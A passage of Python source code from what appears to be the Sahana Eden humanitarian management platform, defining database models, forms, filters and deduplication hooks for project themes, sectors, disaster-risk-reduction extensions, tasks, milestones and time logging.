msg_record_created = T("Output added"),
msg_record_modified = T("Output updated"),
msg_record_deleted = T("Output removed"),
msg_list_empty = T("No outputs found")
)
self.configure(tablename,
deduplicate = self.project_output_deduplicate,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_output_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_output":
return
data = item.data
name = data.get("name", None)
project_id = data.get("project_id", None)
if name:
table = item.table
query = (table.name == name)
if project_id:
query &= ((table.project_id == project_id) | \
(table.project_id == None))
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectSectorModel(S3Model):
"""
Project Sector Model
"""
names = ["project_sector_project"]
def model(self):
T = current.T
# ---------------------------------------------------------------------
# Projects <> Sectors Link Table
#
tablename = "project_sector_project"
self.define_table(tablename,
self.org_sector_id(empty=False),
self.project_project_id(empty=False),
*s3_meta_fields()
)
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Project"),
msg_record_created = T("Sector added to Project"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Project"),
msg_list_empty = T("No Sectors found for this Project")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectThemeModel(S3Model):
"""
Project Theme Model
"""
names = ["project_theme",
"project_theme_id",
"project_theme_sector",
"project_theme_project",
"project_theme_location",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
theme_percentages = current.deployment_settings.get_project_theme_percentages()
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Themes
#
tablename = "project_theme"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_THEME = T("Add Theme")
crud_strings[tablename] = Storage(
title_create = ADD_THEME,
title_display = T("Theme Details"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
#title_upload = T("Import Themes"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = ADD_THEME,
label_delete_button = T("Delete Theme"),
msg_record_created = T("Theme added"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme deleted"),
msg_list_empty = T("No Themes currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
theme_id = S3ReusableField("theme_id", table,
label = T("Theme"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_theme.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE")
# Field settings for project_project.theme field in friendly_string_from_field_query function
# - breaks Action Buttons, so moved to inside the fn which calls them
#table.id.represent = represent
#table.id.label = T("Theme")
# Components
add_component("project_theme_project", project_theme="theme_id")
add_component("project_theme_sector", project_theme="theme_id")
# For Sync Filter
add_component("org_sector",
project_theme=Storage(link="project_theme_sector",
joinby="theme_id",
key="sector_id"))
crud_form = S3SQLCustomForm(
"name",
# Project Sectors
S3SQLInlineComponent(
"theme_sector",
label=T("Sectors to which this Theme can apply"),
fields=["sector_id"],
),
"comments"
)
configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "theme_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Theme - Sector Link Table
#
tablename = "project_theme_sector"
table = define_table(tablename,
theme_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Theme"),
msg_record_created = T("Sector added to Theme"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Theme"),
msg_list_empty = T("No Sectors found for this Theme")
)
# ---------------------------------------------------------------------
# Theme - Project Link Table
#
tablename = "project_theme_project"
table = define_table(tablename,
theme_id(empty=False),
self.project_project_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
#title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project"),
msg_record_created = T("Theme added to Project"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project"),
msg_list_empty = T("No Themes found for this Project")
)
configure(tablename,
deduplicate=self.project_theme_project_deduplicate,
onaccept = self.project_theme_project_onaccept
)
# ---------------------------------------------------------------------
# Theme - Project Location Link Table
#
tablename = "project_theme_location"
table = define_table(tablename,
theme_id(empty=False),
self.project_location_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project Location"),
msg_record_created = T("Theme added to Project Location"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project Location"),
msg_list_empty = T("No Themes found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_onaccept(form):
"""
Record creation post-processing
Update the percentages of all the Project's Locations.
"""
# Check for prepop
project_id = form.vars.get("project_id", None)
if not project_id and form.request_vars:
# Interactive form
project_id = form.request_vars.get("project_id", None)
if not project_id:
return
# Calculate the list of Percentages for this Project
percentages = {}
db = current.db
table = db.project_theme_project
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.theme_id,
table.percentage)
for row in rows:
percentages[row.theme_id] = row.percentage
# Update the Project's Locations
s3db = current.s3db
table = s3db.project_location
ltable = s3db.project_theme_location
update_or_insert = ltable.update_or_insert
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.id)
for row in rows:
for theme_id in percentages:
update_or_insert(project_location_id = row.id,
theme_id = theme_id,
percentage = percentages[theme_id])
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_theme_project":
return
data = item.data
if "project_id" in data and \
"theme_id" in data:
project_id = data.project_id
theme_id = data.theme_id
table = item.table
query = (table.project_id == project_id) & \
(table.theme_id == theme_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectDRRModel(S3Model):
"""
Models for DRR (Disaster Risk Reduction) extensions
"""
names = ["project_drr"]
def model(self):
T = current.T
project_hfa_opts = self.project_hfa_opts()
hfa_opts = dict([(opt, "HFA %s" % opt) for opt in project_hfa_opts])
tablename = "project_drr"
self.define_table(tablename,
self.project_project_id(empty=False),
Field("hfa", "list:integer",
label = T("HFA Priorities"),
requires = IS_NULL_OR(IS_IN_SET(
hfa_opts,
multiple = True)),
widget = S3GroupedOptionsWidget(
cols=1,
help_field=project_hfa_opts
),
represent = S3Represent(options=hfa_opts,
multiple=True),
),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def hfa_opts_represent(opt):
""" Option representation """
if not opt:
return current.messages["NONE"]
if isinstance(opt, int):
opts = [opt]
elif not isinstance(opt, (list, tuple)):
return current.messages["NONE"]
else:
opts = opt
if opts[0] is None:
return current.messages["NONE"]
vals = ["HFA %s" % o for o in opts]
return ", ".join(vals)
# =============================================================================
class S3ProjectDRRPPModel(S3Model):
"""
Models for DRR Project Portal extensions
- injected into custom Project CRUD forms
"""
names = ["project_drrpp"]
def model(self):
T = current.T
db = current.db
NONE = current.messages["NONE"]
local_currencies = current.deployment_settings.get_fin_currencies().keys()
local_currencies.remove("USD")
project_rfa_opts = self.project_rfa_opts()
project_pifacc_opts = self.project_pifacc_opts()
project_jnap_opts = self.project_jnap_opts()
tablename = "project_drrpp"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("parent_project",
represent = lambda v: v or NONE,
label = T("Name of a programme or another project which this project is implemented as part of"),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Parent Project"),
# T("The parent project or programme which this project is implemented under"))),
),
Field("duration", "integer",
represent = lambda v: v or NONE,
label = T("Duration (months)")),
Field("local_budget", "double",
label = T("Total Funding (Local Currency)"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_currency("local_currency",
label = T("Local Currency"),
requires = IS_IN_SET(local_currencies,
zero=None)
),
Field("activities", "text",
represent = lambda v: v or NONE,
label = T("Activities")),
Field("rfa", "list:integer",
label = T("RFA Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_rfa_opts.keys(),
labels = ["RFA %s" % \
rfa for rfa in project_rfa_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "RFA"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_rfa_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("RFA Priorities"),
T("Applicable to projects in Pacific countries only")))),
Field("pifacc", "list:integer",
label = T("PIFACC Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_pifacc_opts.keys(),
labels = ["PIFACC %s" % \
pifacc for pifacc in project_pifacc_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "PIFACC"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_pifacc_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("PIFACC Priorities"),
T("Pacific Islands Framework for Action on Climate Change. Applicable to projects in Pacific countries only")))),
Field("jnap", "list:integer",
label = T("JNAP Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_jnap_opts.keys(),
labels = ["JNAP %s" % \
jnap for jnap in project_jnap_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "JNAP"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_jnap_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("JNAP Priorities"),
T("Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation. Applicable to Cook Islands only")))),
Field("L1", "list:integer",
label = T("Cook Islands"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "gis_location.id",
S3Represent(lookup="gis_location"),
filterby = "L0",
filter_opts = ["Cook Islands"],
not_filterby = "name",
not_filter_opts = ["Cook Islands"],
multiple=True)),
represent = S3Represent(lookup="gis_location",
multiple=True),
widget = lambda f, v, **attr: \
s3_checkboxes_widget(f, v, cols=4, **attr),
),
Field("outputs", "text",
label = "%s (Old - do NOT use)" % T("Outputs"),
represent = lambda v: v or NONE,
readable = False,
writable = False,
),
Field("focal_person",
represent = lambda v: v or NONE,
requires = IS_NOT_EMPTY(),
label = T("Focal Person")),
self.org_organisation_id(label = T("Organization")),
Field("email",
requires=IS_NULL_OR(IS_EMAIL()),
represent = lambda v: v or NONE,
label = T("Email")),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_display = T("DRRPP Extensions"),
title_update = T("Edit DRRPP Extensions"),
)
self.configure(tablename,
onaccept = self.project_drrpp_onaccept,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_drrpp_onaccept(form):
"""
After DB I/O tasks for Project DRRPP records
"""
db = current.db
vars = form.vars
id = vars.id
project_id = vars.project_id
dtable = db.project_drrpp
if not project_id:
# Most reliable way to get the project_id is to read the record
project_id = db(dtable.id == id).select(dtable.project_id,
limitby=(0, 1)
).first().project_id
table = db.project_project
hr_id = db(table.id == project_id).select(table.human_resource_id,
limitby=(0, 1)
).first().human_resource_id
if hr_id:
s3db = current.s3db
htable = db.hrm_human_resource
ctable = s3db.pr_contact
ptable = db.pr_person
query = (htable.id == hr_id) & \
(ptable.id == htable.person_id)
left = ctable.on((ctable.pe_id == ptable.pe_id) & \
(ctable.contact_method == "EMAIL"))
row = db(query).select(htable.organisation_id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
ctable.value,
left=left,
limitby=(0, 1)).first()
focal_person = s3_fullname(row[ptable])
organisation_id = row[htable].organisation_id
email = row[ctable].value
db(dtable.id == id).update(focal_person = focal_person,
organisation_id = organisation_id,
email = email,
)
# -------------------------------------------------------------------------
@staticmethod
def opts_represent(opt, prefix):
""" Option representation """
if isinstance(opt, int):
opts = [opt]
if isinstance(opt, (list, tuple)):
if not opt or opt[0] is None:
return current.messages["NONE"]
else:
return ", ".join(["%s %s" % (prefix, o) for o in opt])
else:
return current.messages["NONE"]
# =============================================================================
class S3ProjectTaskModel(S3Model):
"""
Project Task Model
This class holds the tables used for an Organisation to manage
their Tasks in detail.
"""
names = ["project_milestone",
"project_task",
"project_task_id",
"project_time",
"project_comment",
"project_task_project",
"project_task_activity",
"project_task_milestone",
"project_task_represent_w_project",
]
def model(self):
db = current.db
T = current.T
auth = current.auth
request = current.request
project_id = self.project_project_id
messages = current.messages
UNKNOWN_OPT = messages.UNKNOWN_OPT
# Shortcuts
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
super_link = self.super_link
# ---------------------------------------------------------------------
# Project Milestone
#
tablename = "project_milestone"
table = define_table(tablename,
# Stage Report
super_link("doc_id", "doc_entity"),
project_id(),
Field("name",
label = T("Short Description"),
requires=IS_NOT_EMPTY()),
s3_date(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_MILESTONE = T("Add Milestone")
crud_strings[tablename] = Storage(
title_create = ADD_MILESTONE,
title_display = T("Milestone Details"),
title_list = T("Milestones"),
title_update = T("Edit Milestone"),
title_search = T("Search Milestones"),
#title_upload = T("Import Milestones"),
subtitle_create = T("Add New Milestone"),
label_list_button = T("List Milestones"),
label_create_button = ADD_MILESTONE,
msg_record_created = T("Milestone Added"),
msg_record_modified = T("Milestone Updated"),
msg_record_deleted = T("Milestone Deleted"),
msg_list_empty = T("No Milestones Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename,
fields=["name", "date"],
labels="%(name)s: %(date)s",
)
milestone_id = S3ReusableField("milestone_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_milestone.id",
represent)),
represent = represent,
comment = S3AddResourceLink(c="project",
f="milestone",
title=ADD_MILESTONE,
tooltip=T("A project milestone marks a significant date in the calendar which shows that progress towards the overall objective is being made.")),
label = T("Milestone"),
ondelete = "RESTRICT")
configure(tablename,
orderby=table.date,
)
# ---------------------------------------------------------------------
# Tasks
#
# Tasks can be linked to Activities or directly to Projects
# - they can also be used by the Event/Scenario modules
#
# @ToDo: Task templates
# @ToDo: Recurring tasks
#
# These Statuses can be customised, although doing so limits the ability to do synchronization
# - best bet is simply to comment statuses that you don't wish to use
#
project_task_status_opts = {
1: T("Draft"),
2: T("New"),
3: T("Assigned"),
4: T("Feedback"),
5: T("Blocked"),
6: T("On Hold"),
7: T("Canceled"),
8: T("Duplicate"),
9: T("Ready"),
10: T("Verified"),
11: T("Reopened"),
12: T("Completed"),
#99: T("unspecified")
}
project_task_active_statuses = [2, 3, 4, 11]
project_task_priority_opts = {
1:T("Urgent"),
2:T("High"),
3:T("Normal"),
4:T("Low")
}
#staff = auth.s3_has_role("STAFF")
staff = True
settings = current.deployment_settings
tablename = "project_task"
table = define_table(tablename,
super_link("doc_id", "doc_entity"),
Field("template", "boolean",
default=False,
readable=False,
writable=False),
Field("name",
label = T("Short Description"),
length=100,
notnull=True,
requires = IS_LENGTH(maxsize=100, minsize=1)),
Field("description", "text",
label = T("Detailed Description/URL"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Detailed Description/URL"),
T("Please provide as much detail as you can, including the URL(s) where the bug occurs or you'd like the new feature to go.")))),
self.org_site_id,
self.gis_location_id(
label=T("Deployment Location"),
readable=False,
writable=False
),
Field("source",
label = T("Source")),
Field("priority", "integer",
requires = IS_IN_SET(project_task_priority_opts,
zero=None),
default = 3,
label = T("Priority"),
represent = lambda opt: \
project_task_priority_opts.get(opt,
UNKNOWN_OPT)),
# Could be a Person, Team or Organisation
super_link("pe_id", "pr_pentity",
readable = staff,
writable = staff,
label = T("Assigned to"),
filterby = "instance_type",
filter_opts = ["pr_person", "pr_group", "org_organisation"],
represent = self.project_assignee_represent,
# @ToDo: Widget
#widget = S3PentityWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Assigned to"),
# T("Enter some characters to bring up a list of possible matches")))
),
s3_datetime("date_due",
label = T("Date Due"),
past=0,
future=8760, # Hours, so 1 year
represent="date",
readable = staff,
writable = staff,
),
Field("time_estimated", "double",
readable = staff,
writable = staff,
represent = lambda v: v or "",
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))),
Field("time_actual", "double",
readable = staff,
# This comes from the Time component
writable=False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))),
Field("status", "integer",
requires = IS_IN_SET(project_task_status_opts,
zero=None),
default = 2,
readable = staff,
writable = staff,
label = T("Status"),
represent = lambda opt: \
project_task_status_opts.get(opt,
UNKNOWN_OPT)),
*s3_meta_fields())
# Virtual field
table.task_id = Field.Lazy(self.project_task_task_id)
# Field configurations
# Comment these if you don't need a Site associated with Tasks
#table.site_id.readable = table.site_id.writable = True
#table.site_id.label = T("Check-in at Facility") # T("Managing Office")
table.created_on.represent = lambda dt: \
S3DateTime.date_represent(dt, utc=True)
# CRUD Strings
ADD_TASK = T("Add Task")
crud_strings[tablename] = Storage(
title_create = ADD_TASK,
title_display = T("Task Details"),
title_list = T("Tasks"),
title_update = T("Edit Task"),
title_search = T("Search Tasks"),
title_upload = T("Import Tasks"),
subtitle_create = T("Add New Task"),
label_list_button = T("List Tasks"),
label_create_button = ADD_TASK,
msg_record_created = T("Task added"),
msg_record_modified = T("Task updated"),
msg_record_deleted = T("Task deleted"),
msg_list_empty = T("No tasks currently registered"))
# Search Method
filter_widgets = [
S3TextFilter(["name",
"description",
],
label=T("Description"),
_class="filter-search",
),
S3OptionsFilter("priority",
label=T("Priority"),
#represent="%(name)s",
#widget="multiselect",
options=project_task_priority_opts,
cols=4,
),
S3OptionsFilter("task_project.project_id",
label=T("Project"),
options = self.project_task_project_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_activity.activity_id",
label=T("Activity"),
options = self.project_task_activity_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("pe_id",
label=T("Assigned To"),
# @ToDo: Implement support for this in S3OptionsFilter
#null = T("Unassigned"),
#represent="%(name)s",
#widget="multiselect",
cols=4,
),
S3OptionsFilter("created_by",
label=T("Created By"),
#widget="multiselect",
cols=3,
hidden=True,
),
S3RangeFilter("created_on",
label=T("Date Created"),
hide_time=True,
hidden=True,
),
S3RangeFilter("date_due",
label=T("Date Due"),
hide_time=True,
hidden=True,
),
S3RangeFilter("modified_on",
label=T("Date Modified"),
hide_time=True,
hidden=True,
),
S3OptionsFilter("status",
label=T("Status"),
options=project_task_status_opts,
#represent="%(name)s",
#widget="multiselect",
cols=4,
),
]
list_fields=["id",
(T("ID"), "task_id"),
"priority",
"name",
"pe_id",
"date_due",
"time_estimated",
"time_actual",
"created_on",
"status",
#"site_id"
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(5, (T("Milestone"), "task_milestone.milestone_id"))
filter_widgets.insert(4, S3OptionsFilter("task_milestone.milestone_id",
label = T("Milestone"),
options = self.project_task_milestone_opts,
cols = 3
))
report_options = Storage(rows = list_fields,
cols = list_fields,
fact = list_fields,
defaults = Storage(rows = "task.project",
cols = "task.pe_id",
fact = "sum(task.time_estimated)",
totals = True
),
)
# Custom Form
crud_form = S3SQLCustomForm(
"name",
"description",
"source",
"priority",
"pe_id",
"date_due",
"time_estimated",
"status",
S3SQLInlineComponent(
"time",
label = T("Time Log"),
fields = ["date",
"person_id",
"hours",
"comments"
],
orderby = "date"
),
"time_actual",
)
# Resource Configuration
configure(tablename,
super_entity = "doc_entity",
copyable = True,
orderby = "project_task.priority,project_task.date_due asc",
realm_entity = self.project_task_realm_entity,
onvalidation = self.project_task_onvalidation,
#create_next = URL(f="task", args=["[id]"]),
create_onaccept = self.project_task_create_onaccept,
update_onaccept = self.project_task_update_onaccept,
filter_widgets = filter_widgets,
report_options = report_options,
list_fields = list_fields,
extra_fields = ["id"],
crud_form = crud_form,
extra = "description"
)
# Reusable field
task_id = S3ReusableField("task_id", table,
label = T("Task"),
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_task.id",
self.project_task_represent)),
represent = self.project_task_represent,
comment = S3AddResourceLink(c="project",
f="task",
title=ADD_TASK,
tooltip=T("A task is a piece of work that an individual or team can do in 1-2 days.")),
ondelete = "CASCADE")
# Custom Methods
set_method("project", "task",
method="dispatch",
action=self.project_task_dispatch)
# Components
# Projects (for imports)
add_component("project_project",
project_task=dict(link="project_task_project",
joinby="task_id",
key="project_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Activities
add_component("project_activity",
project_task=dict(link="project_task_activity",
joinby="task_id",
key="activity_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Milestones
add_component("project_milestone",
project_task=dict(link="project_task_milestone",
joinby="task_id",
key="milestone_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Job titles
add_component("hrm_job_title",
project_task=dict(link="project_task_job_title",
joinby="task_id",
key="job_title_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Human Resources (assigned)
add_component("hrm_human_resource",
project_task=dict(link="project_task_human_resource",
joinby="task_id",
key="human_resource_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Requests
add_component("req_req",
project_task=dict(link="project_task_req",
joinby="task_id",
key="req_id",
actuate="embed",
autocomplete="request_number",
autodelete=False))
# Time
add_component("project_time", project_task="task_id")
# Comments (for imports))
add_component("project_comment", project_task="task_id")
# ---------------------------------------------------------------------
# Link Tasks <-> Projects
#
tablename = "project_task_project"
table = define_table(tablename,
task_id(),
project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link task <-> activity
#
# Tasks <> Activities
tablename = "project_task_activity"
table = define_table(tablename,
task_id(),
self.project_activity_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link task <-> milestone
#
# Tasks <> Milestones
tablename = "project_task_milestone"
table = define_table(tablename,
task_id(),
milestone_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Project comment
#
# @ToDo: Attachments?
#
# Parent field allows us to:
# * easily filter for top-level threads
# * easily filter for next level of threading
# * hook a new reply into the correct location in the hierarchy
#
tablename = "project_comment"
table = define_table(tablename,
Field("parent", "reference project_comment",
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "project_comment.id"
)),
readable=False),
task_id(),
Field("body", "text",
notnull=True,
label = T("Comment")),
*s3_meta_fields())
# Resource Configuration
configure(tablename,
list_fields=["id",
"task_id",
"created_by",
"modified_on"
])
# ---------------------------------------------------------------------
# Project Time
# - used to Log hours spent on a Task
#
tablename = "project_time"
table = define_table(tablename,
task_id(
requires = IS_ONE_OF(db, "project_task.id",
self.project_task_represent_w_project,
),
),
self.pr_person_id(default=auth.s3_logged_in_person(),
widget = SQLFORM.widgets.options.widget
),
s3_datetime(default="now",
past=8760, # Hours, so 1 year
future=0
),
Field("hours", "double",
label = "%s (%s)" % (T("Time"),
T("hours")),
represent=lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_TIME = T("Log Time Spent")
crud_strings[tablename] = Storage(
title_create = ADD_TIME,
title_display = T("Logged Time Details"),
title_list = T("Logged Time"),
title_update = T("Edit Logged Time"),
title_search = T("Search Logged Time"),
title_upload = T("Import Logged Time data"),
title_report = T("Project Time Report"),
subtitle_create = T("Log New Time"),
label_list_button = T("List Logged Time"),
label_create_button = ADD_TIME,
msg_record_created = T("Time Logged"),
msg_record_modified = T("Time Log Updated"),
msg_record_deleted = T("Time Log Deleted"),
msg_list_empty = T("No Time Logged")
)
if "rows" in request.get_vars and request.get_vars.rows == "project":
crud_strings[tablename].title_report = T("Project Time Report")
list_fields = ["id",
(T("Project"), "task_id$task_project.project_id"),
(T("Activity"), "task_id$task_activity.activity_id"),
"task_id",
"person_id",
"date",
"hours",
"comments",
]
# Virtual Fields
table.day = Field.Lazy(project_time_day)
table.week = Field.Lazy(project_time_week)
filter_widgets = [
S3OptionsFilter("person_id",
label=T("Person"),
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_id$task_project.project_id",
label=T("Project"),
options = self.project_task_project_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_id$task_activity.activity_id",
label=T("Activity"),
options = self.project_task_activity_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
hidden=True,
),
S3DateFilter("date",
label=T("Date"),
hide_time=True,
hidden=True,
),
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(3, (T("Milestone"), "task_id$task_milestone.milestone_id"))
filter_widgets.insert(3, S3OptionsFilter("task_id$task_milestone.milestone_id",
label = T("Milestone"),
cols = 3,
hidden = True,
))
report_fields = list_fields + \
[(T("Day"), "day"),
(T("Week"), "week")]
if settings.get_project_sectors():
report_fields.insert(3, (T("Sector"),
"task_id$task_project.project_id$sector_project.sector_id"))
def get_sector_opts():
stable = self.org_sector
rows = db(stable.deleted == False).select(stable.id, stable.name)
sector_opts = {}
for row in rows:
sector_opts[row.id] = row.name
return sector_opts
filter_widgets.insert(1, S3OptionsFilter("task_id$task_project.project_id$sector_project.sector_id",
label = T("Sector"),
options = get_sector_opts,
cols = 3,
))
# Custom Methods
set_method("project", "time",
method="effort",
action=self.project_time_effort_report)
configure(tablename,
onaccept=self.project_time_onaccept,
filter_widgets=filter_widgets,
report_fields=["date"],
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="task_id$task_project.project_id",
cols="person_id",
fact="sum(hours)",
totals=True
),
),
list_fields=list_fields
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
project_task_id = task_id,
project_task_active_statuses = project_task_active_statuses,
project_task_represent_w_project = self.project_task_represent_w_project,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_task_id = lambda: dummy("task_id"),
project_task_active_statuses = [],
)
# -------------------------------------------------------------------------
@staticmethod
def project_task_task_id(row):
""" The record ID of a task as separate column in the data table """
if hasattr(row, "project_task"):
row = row.project_task
try:
return row.id
except AttributeError:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_project_opts():
"""
Provide the options for the Project search filter
- all Projects with Tasks
"""
db = current.db
ptable = db.project_project
ttable = db.project_task
ltable = db.project_task_project
query = (ttable.deleted != True) & \
(ltable.task_id == ttable.id) & \
(ltable.project_id == ptable.id)
rows = db(query).select(ptable.id, ptable.name)
return dict([(row.id, row.name) for row in rows])
# -------------------------------------------------------------------------
@staticmethod
def project_task_activity_opts():
"""
Provide the options for the Activity search filter
- all Activities with Tasks
"""
db = current.db
atable = db.project_activity
ttable = db.project_task
ltable = db.project_task_activity
query = (ttable.deleted == False) & \
(ltable.task_id == ttable.id) & \
(ltable.activity_id == atable.id)
opts = db(query).select(atable.name)
_dict = {}
for opt in opts:
_dict[opt.name] = opt.name
return _dict
# -------------------------------------------------------------------------
@staticmethod
def project_task_milestone_opts():
"""
Provide the options for the Milestone search filter
- all Activities with Tasks
"""
db = current.db
mtable = db.project_milestone
ttable = db.project_task
ltable = db.project_task_milestone
query = (ttable.deleted == False) & \
(ltable.task_id == ttable.id) & \
(ltable.milestone_id == mtable.id)
opts = db(query).select(mtable.name)
_dict = {}
for opt in opts:
_dict[opt.name] = opt.name
return _dict
# -------------------------------------------------------------------------
@staticmethod
def project_assignee_represent(id, row=None):
""" FK representation """
if row:
id = row.pe_id
instance_type = row.instance_type
elif id:
if isinstance(id, Row):
instance_type = id.instance_type
id = id.pe_id
else:
instance_type = None
else:
return current.messages["NONE"]
db = current.db
s3db = current.s3db
if not instance_type:
table = s3db.pr_pentity
r = db(table._id == id).select(table.instance_type,
limitby=(0, 1)).first()
instance_type = r.instance_type
if instance_type == "pr_person":
# initials?
return s3_fullname(pe_id=id) or current.messages.UNKNOWN_OPT
elif instance_type in ("pr_group", "org_organisation"):
# Team or Organisation
